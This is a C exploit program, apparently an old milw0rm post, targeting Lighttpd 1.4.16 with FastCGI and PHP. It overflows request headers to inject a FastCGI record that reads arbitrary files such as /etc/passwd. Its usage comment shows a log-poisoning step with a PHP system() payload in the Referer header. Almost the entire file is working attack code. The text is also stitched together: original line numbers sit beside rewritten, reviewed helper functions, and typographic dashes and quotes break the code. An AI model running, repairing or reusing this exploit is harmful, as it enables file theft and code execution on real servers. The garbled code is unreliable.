   1   /*
   2    * Remote Lighttpd + FastCGI + PHP example exploit
   3    *
   4    * Tested with Lighttpd 1.4.16 and PHP 5.2.4
   5    *
   6    * To avoid abuse there's a "remove me" in the code.
   7    *
   8    * Example:
   9    *
  10    * # ./exploit localhost 80 /etc/passwd
  11    *
  12    * or
  13    *
  14    * # wget −−referer="<?php system(’/usr/bin/id’); ?>" localhost
  15    * # ./exploit localhost 80 /var/log/lighttpd/access.log
  16    *
  17    *
  18    * Mattias Bengtsson <mattias@secweb.se>
  19    *
  20    * http://www.secweb.se/
  21    *
  22    */
  23
  24   #include   <stdio.h>
  25   #include   <stdlib.h>
  26   #include   <string.h>
  27   #include   <unistd.h>
  28
  29   #include <sys/types.h>
  30   #include <sys/socket.h>
  31
  32   #include <netdb.h>
  33   #include <arpa/inet.h>
  34   #include <netinet/in.h>
  35
/*
 * Write one "Name: value\r\n" header line into p, made of a single repeated
 * letter: a bytes of name, ": ", b bytes of value, then CRLF.  The letter is
 * derived from c (c % 25 added to 'A').  p must have room for a + b + 4
 * bytes; no NUL terminator is written.  Returns the number of bytes written.
 */
int append_header(char *p, int c, int a, int b)
{
        const int fill = 0x41 + (c % 25);
        const int total = a + b + 4;

        memset(p, fill, total);

        /* separator after the name, CRLF at the very end */
        p[a] = ':';
        p[a + 1] = ' ';
        p[total - 2] = '\r';
        p[total - 1] = '\n';

        return total;
}
  49
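/*
 * Open a TCP connection to host:port.
 *
 * Returns the connected socket descriptor, or 0 on any failure (name lookup,
 * socket creation, connect) so that the caller's "sock <= 0" check keeps
 * working.  No descriptor is leaked on the failure paths.
 *
 * NOTE(review): gethostbyname is obsolete and not thread-safe; getaddrinfo
 * would be the modern replacement, but the IPv4-only contract is kept here.
 */
int network(const char *host, int port)
{
        struct sockaddr_in addr;
        struct hostent *he;
        int sock;

        /* Resolve first so a lookup failure cannot leak a socket. */
        if ((he = gethostbyname(host)) == NULL)
                return 0;

        /* Only copy an address of the size sin_addr can actually hold. */
        if (he->h_addrtype != AF_INET || he->h_length != (int)sizeof addr.sin_addr)
                return 0;

        sock = socket(AF_INET, SOCK_STREAM, 0);
        if (sock < 0)
                return 0;

        memset(&addr, 0, sizeof addr);
        addr.sin_family = AF_INET;
        memcpy(&addr.sin_addr, he->h_addr_list[0], sizeof addr.sin_addr);
        addr.sin_port = htons((unsigned short)port);

        /* The original ignored connect()'s result and returned an unconnected fd. */
        if (connect(sock, (struct sockaddr *)&addr, sizeof addr) < 0) {
                close(sock);
                return 0;
        }

        return sock;
}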
  71
/*
 * Entry point.  argv[1] = host, argv[2] = port, argv[3] = file path.
 * Builds a single HTTP request in a heap buffer, sends it over the socket
 * returned by network(), reads one chunk of the reply and prints it.
 *
 * NOTE(review): almost no return value in this function is checked (malloc,
 * sprintf, write, read); the individual notes below mark the spots where
 * that is an actual memory-safety problem for the tool itself.
 */
  72    int main(int argc, char **argv)
  73    {
  74            char *b, *p;
  75            int sock, i;
  76            char tmp[1024];
  77
  78           if(argc < 4) {
  79                   fprintf(stderr, "Usage: %s <host> <port> <file>\n", argv[0]);
               // exit status 0 on a usage error; callers/scripts cannot tell failure from success
  80                   exit(0);
  81           }
  82
  83           sock = network(argv[1], atoi(argv[2]));
  84
  85           if(sock <= 0) {
  86                   fprintf(stderr, "Host down?\n");
  87                   exit(0);
  88           }
  89
               // NOTE(review): malloc result is never checked; a NULL return is
               // dereferenced by the first sprintf below.
  90            b = p = malloc(0xffff + 0xffff);
  91
  92           p += sprintf(p, "GET /index.php HTTP/1.1\r\n");
  93           p += sprintf(p, "Host: %s\r\n", argv[1]);
  94           p += sprintf(p, "A: A\r\nB: ");
  95
  96            *p++ = 128;
  97            *p++ = 0x00;
  98            *p++ = 0x54;
  99            *p++ = 0x42;
  100           *p++ = ’\r’;
  101           *p++ = ’\n’;
  102           p = 0x00;
  103
  104           p += append_header(p, 0, 4, 1);
  105           p += append_header(p, 1, 200 , 25079);
  106
  107           p −= 3631;
  108
  109           *p++   =   1; // Version
  110           *p++   =   4; // Type
  111           *p++   =   0;
  112           *p++   =   0;
  113
  114           i = sprintf(tmp, "SCRIPT_FILENAME");
               // NOTE(review): tmp is 1024 bytes and argv[3] is copied with an
               // unbounded sprintf — an over-long argument overflows the tool's own
               // stack buffer.  snprintf(tmp + i, sizeof tmp - i, "%s", argv[3])
               // plus a truncation check is what belongs here.
  115           sprintf(tmp + i, "%s", argv[3]);
  116
  117           *p++   =   0x00; // Length
               // NOTE(review): stored in a single byte; a long tmp is silently
               // truncated here, with no corresponding check.
  118           *p++   =   2 + strlen(tmp); // Length
  119           *p++   =   0x00; // Padding
  120           *p++   =   0x10;
  121           *p++   =   i; // name_len
  122           *p++   =   strlen(tmp) − i; // var_len
  123
  124           memcpy(p, tmp, strlen(tmp));
  125
  126           p += 3631 − 8 − 2;
  127
  128           p += append_header(p, 2, 200, 40007);
  129           p += sprintf(p, "\r\n\r\n");
  130
               // NOTE(review): write() may be short or fail; the result is ignored.
  131           write(sock, b, (p − b));
  132
               // NOTE(review): read() returns -1 on error; the next line then
               // writes one byte before the allocation.  Check i < 0 first.
  133           i = read(sock, b, 0xffff);
  134           *(b + i) = 0;
  135
  136           printf("%s\n", b);
  137
  138           free(b);
  139           close(sock);
  140
  141           return 0;
  142   }
  143
  144   // milw0rm.com [2007-09-10]



